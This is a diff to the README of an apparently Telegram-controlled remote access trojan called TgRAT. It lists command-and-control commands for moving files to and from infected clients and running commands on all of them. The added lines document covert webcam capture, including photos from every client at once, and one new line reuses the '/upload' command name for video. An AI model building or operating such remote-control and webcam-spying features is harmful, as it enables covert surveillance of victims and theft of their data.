17tayyy/TgRAT/README.md

 - `/kill` – Delete the client thread
 - `/download <file path>` – Download a file from the agent
 - `/upload <file path>` – Upload a file to the agent
+- `/listwebcams` – Return the index of available cameras
+- `/photo <camera index>` – Take Photo from the webcam
+- `/upload <file path>` – Takes a video from the webcam

 ### In the main thread (global)
 - `/sendall <command>` – Execute command on all clients
 - `/statusall` – Check connection status for all clients
 - `/shutdown` – Gracefully shut down the C2 server
+- `/photoall` – Takes a photo from default webcam  of the allclients

 ---